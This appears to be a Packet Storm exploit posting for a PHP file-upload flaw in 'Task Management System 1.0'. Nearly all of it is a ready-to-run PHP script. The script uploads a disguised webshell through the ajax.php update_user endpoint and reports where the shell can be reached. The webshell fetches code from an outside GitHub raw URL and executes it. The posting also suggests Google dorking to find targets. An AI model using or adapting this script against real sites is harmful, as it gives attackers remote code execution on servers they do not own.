Share
## https://sploitus.com/exploit?id=PACKETSTORM:181964
=============================================================================================================================================  
| # Title : Task Management System 1.0 php code injection Vulnerability |  
| # Author : indoushka |  
| # Tested on : windows 10 Fr(Pro) / browser : Mozilla firefox 130.0.0 (64 bits) |  
| # Vendor : https://www.campcodes.com/downloads/task-management-system-in-php-mysql-source-code/?wpdmdl=8164&refresh=66bb949d45e891723569309 |  
=============================================================================================================================================  
  
poc :  
  
[+] Dorking ฤฐn Google Or Other Search Enggine.  
  
[+] This PHP code is designed to create a file and inject PHP code.  
  
[+] save payload as poc.php   
  
[+] usage : C:\www\test>php poc.php 127.0.0.1  
  
[+] payload :   
  
<?php  
  
function file_upload($target_ip) {  
$file_name = "indoushka.php";  
$webshell_payload = "<?php  
\$url = 'https://raw.githubusercontent.com/indoushka/txt/main/indoushka.txt';  
\$ch = curl_init();  
curl_setopt(\$ch, CURLOPT_URL, \$url);  
curl_setopt(\$ch, CURLOPT_RETURNTRANSFER, true);  
\$output = curl_exec(\$ch);  
curl_close(\$ch);  
if (\$output) {  
include 'data://text/plain;base64,' . base64_encode(\$output);  
}  
?>";  
  
$post_fields = array(  
  
'save' => '',  
'firstname' => 'az',  
'lastname' => 'azgt',  
'email' => 'az@gt.gt',  
'password' => 'az@gtgt',  
'img' => new CURLFile('data://text/plain;base64,' . base64_encode($webshell_payload), 'application/x-php', $file_name),  
  
  
  
'qty' => '1'  
);  
  
$ch = curl_init();  
curl_setopt($ch, CURLOPT_URL, "$target_ip/ajax.php?action=update_user");  
curl_setopt($ch, CURLOPT_POST, 1);  
curl_setopt($ch, CURLOPT_POSTFIELDS, $post_fields);  
curl_setopt($ch, CURLOPT_RETURNTRANSFER, true);  
  
$response = curl_exec($ch);  
curl_close($ch);  
  
echo "(+) Shell uploaded successfully.\n";  
echo "(+) Access the shell at: $target_ip/assets/uploads/\n";  
}  
  
if ($argc != 2) {  
echo "(+) Usage: php " . $argv[0] . " <target ip>\n";  
echo "(+) Example: php " . $argv[0] . " 10.0.0.1\n";  
exit(-1);  
}  
  
$target_ip = $argv[1];  
file_upload($target_ip);  
  
  
Greetings to :=====================================================================================  
jericho * Larry W. Cashdollar * LiquidWorm * Hussin-X * D4NB4R * Malvuln (John Page aka hyp3rlinx)|  
===================================================================================================